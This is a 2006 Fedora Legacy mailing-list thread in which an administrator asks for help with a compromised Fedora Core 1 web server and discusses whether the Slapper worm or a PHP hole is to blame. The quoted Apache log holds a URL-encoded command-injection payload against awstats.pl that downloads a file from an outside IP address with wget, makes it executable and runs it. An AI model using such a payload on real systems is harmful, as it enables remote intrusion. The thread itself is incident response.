Hi Mike, > > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > > 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET > > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft > > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip > >z%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" > > 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT > > 5.1;)" > > > > These "scripz" files end up going into /tmp, being compiled with > > gcc, renamed to "httpd" and run as that. > > > > I'm using: > > > > perl-5.8.3-17.4.legacy > > httpd-2.0.51-1.9.legacy > > openssl-0.9.7a-33.13.legacy > > > > Are there any updates FL can do to any of the packages to > > fix/block slapper from an FC1 machine? > > > > Michael. > > > > > Are you sure it's using an SSL exploit? > > http://www.lurhq.com/slapperv2.html > > Regards, Mike Klinke
No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1 machine that was, had the xmlrpc.php file which I've now removed. Michael. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list